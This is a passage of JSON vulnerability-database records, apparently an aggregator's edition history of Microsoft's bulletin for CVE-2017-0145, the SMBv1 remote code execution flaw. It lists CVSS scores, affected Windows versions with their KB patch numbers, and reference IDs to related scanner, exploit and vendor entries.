"KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB4014077", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4014077", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", "KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": 